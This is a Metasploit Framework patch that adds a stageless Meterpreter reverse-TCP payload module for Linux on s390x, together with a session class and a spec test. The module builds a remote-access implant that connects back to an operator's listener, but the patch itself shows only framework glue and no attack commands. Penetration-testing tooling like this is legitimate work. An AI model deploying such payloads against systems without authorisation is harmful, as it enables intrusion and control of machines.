From ccba73b324a4093648a2386f72e0357d5d0d8470 Mon Sep 17 00:00:00 2001
From: Adam Cammack <adam_cammack@rapid7.com>
Date: Fri, 9 Dec 2016 18:30:52 -0600
Subject: [PATCH] Add stageless mettle for Linux/zarch

---
 .../base/sessions/meterpreter_zarch_linux.rb  | 29 +++++++++++++
 .../singles/linux/zarch/mettle_reverse_tcp.rb | 41 +++++++++++++++++++
 spec/modules/payloads_spec.rb                 | 10 +++++
 3 files changed, 80 insertions(+)
 create mode 100644 lib/msf/base/sessions/meterpreter_zarch_linux.rb
 create mode 100644 modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb

diff --git a/lib/msf/base/sessions/meterpreter_zarch_linux.rb b/lib/msf/base/sessions/meterpreter_zarch_linux.rb
new file mode 100644
index 0000000000..65ac0f1e96
--- /dev/null
+++ b/lib/msf/base/sessions/meterpreter_zarch_linux.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_zarch_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_ZARCH
+  end
+end
+
+end
+end
+
diff --git a/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb
new file mode 100644
index 0000000000..9f74d416ff
--- /dev/null
+++ b/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb
@@ -0,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_zarch_linux'
+
+module MetasploitModule
+
+  CachedSize = 367864
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_ZARCH,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_zarch_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config).to_binary :exec
+  end
+end
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index b9636bddb4..8ca160f866 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4524,4 +4524,14 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/x86/mettle_reverse_tcp'
   end
 
+  context 'linux/zarch/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/zarch/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/zarch/mettle_reverse_tcp'
+  end
+
 end